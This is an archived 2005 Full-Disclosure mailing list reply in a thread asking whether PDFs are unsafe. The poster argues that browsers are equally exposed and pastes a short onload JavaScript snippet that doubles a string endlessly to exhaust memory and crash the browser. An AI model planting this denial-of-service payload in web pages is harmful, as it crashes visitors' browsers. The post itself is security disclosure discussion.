[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] PDF's unsafe?

To: "Geo." <geoincidents@xxxxxxx>
Subject: Re: [Full-disclosure] PDF's unsafe?
From: Bipin Gautam <gautam.bipin@xxxxxxxxx>
Date: Thu, 22 Sep 2005 15:37:51 +0545

On 9/21/05, Geo. <geoincidents@xxxxxxx> wrote:
> Haven't any of the security firms checked out adobe pdf reader to see if
> it's safe? It took 5 minutes to create this nonsense
> http://www.nthelp.com/test.pdf and that's just using the standard features.
> I hate to think what a real hacker could do with a pdf.
>
> Geo.
>
Even if you have the option in IE "Play videos in webpage"
unchecked... the following page will render....

http://bipin.sosvulnerable.net/temp/fdrd.html

& probably your OS will colse the browser after it runs out of memory.

Or maybe try this:

/* ------------
<body onload="hUNT()">
<script language="JavaScript"><!--
var szhUNT="...cauz its a jungle out there!"
function hUNT()
{szhUNT=szhUNT + szhUNT
window.status="String Length is: "+szhUNT.length
window.setTimeout('hUNT()',1);}
// --></script>
--------------------------- */
SO IE/mozilla  is unsafe?

Bipin Gautam
http://bipin.tk

Zeroth law of security: The possibility of poking a system from lower
privilege is zero unless & until there is possibility of direct,
indirect or consequential communication between the two...
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- [Full-disclosure] PDF's unsafe?
  - From: Geo.

Prev by Date: [Full-disclosure] [SECURITY] [DSA 816-1] New XFree86 packages fix arbitrary code execution
Next by Date: [Full-disclosure] Av, spyware, ddl trojan assesment
Previous by thread: Re: [Full-disclosure] PDF's unsafe?
Next by thread: Re: [Full-disclosure] PDF's unsafe?
Index(es):
- Date
- Thread